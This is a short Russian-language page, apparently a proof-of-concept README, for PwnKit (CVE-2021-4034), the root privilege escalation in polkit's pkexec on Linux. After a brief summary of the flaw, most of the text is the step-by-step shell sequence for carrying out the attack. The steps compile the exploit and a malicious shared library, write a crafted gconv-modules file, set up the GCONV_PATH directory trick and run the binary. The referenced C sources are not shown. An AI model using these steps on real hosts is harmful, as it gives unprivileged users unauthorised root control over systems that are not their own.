
PwnKit — локальная уязвимость повышения привилегий, обнаруженная в pkexec из polkit (CVE-2021-4034)
Команда Qualys Research Team обнаружила уязвимость повреждения памяти в pkexec из polkit — программе с SUID-root, которая установлена по умолчанию во всех основных дистрибутивах Linux. Эта легко эксплуатируемая уязвимость позволяет любому непривилегированному пользователю получить полные права root на уязвимом хосте, эксплуатируя её в конфигурации по умолчанию.
PwnKit: уязвимость локального повышения привилегий, обнаруженная в pkexec из polkit (CVE-2021-4034)
Ubuntu 20.04.3 LTS x86_64
версия pkexec 0.105
mkdir /tmp/pwnkit_lpe/
gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c
gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit
echo "module UTF-8// PWNKIT// pwnkit 1" > /tmp/pwnkit_lpe/gconv-modules
mkdir -p "/tmp/pwnkit_lpe/GCONV_PATH=."
cp /usr/bin/true "/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:."
cd /tmp/pwnkit_lpe/
./pwnkit